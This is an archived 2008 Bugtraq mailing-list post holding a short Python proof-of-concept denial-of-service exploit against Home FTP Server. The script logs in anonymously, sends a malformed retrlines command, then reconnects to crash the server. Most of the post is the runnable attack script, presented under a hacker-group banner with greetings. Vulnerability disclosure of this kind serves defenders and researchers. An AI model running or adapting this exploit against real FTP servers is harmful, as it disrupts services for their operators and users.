lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080317194927.20642.qmail@securityfocus.com>
Date: 17 Mar 2008 19:49:27 -0000
From: 0in.email@...il.com
To: bugtraq@...urityfocus.com
Subject: Home FTP Server DoS

# Discovered by 0in from DaRk-CodeRs Programming & Security Group
# Contact: 0in(dot)email[at]gmail(dot)com
# Thats a very funny bug, and nobody understand how it works;]
# When we send a python FTP retrlines() function bad command and create
# a new connection server got DoS... o0
# Thats not overflow, it's probubly in logic application.
# Greetings to all DaRk-CodeRs Members:
# Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89
# Special THX to: Rade0n3900
#        Debug:
# ----------------------
# | EIP: 0100FE98      |
# | DS:[00FFFFED4]=??? |
# | ECX: 0100FED4      |
# ----------------------
from ftplib import FTP
import time
ip="127.0.0.1"
login="anonymous"
passwd = 'gorion@...iptkiddie.pl'
print '-------------------------------'
print '| HOME FTP SERVER DoS Exploit |'
print '|   bY 0in From Dark-Coders!  |'
print '|>>http://dark-coders.4rh.eu<<|'
print '-------------------------------'
print 'connecting...'
ftp=FTP(ip)
ftp.login(login,passwd)
print 'sending...'
try:
    ftp.retrlines("AAAA")
except Exception:
    print 'ok!\nreconnecting...'
    ftp=FTP(ip)
    ftp.quit()
print 'DosEd'
#EoFF 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ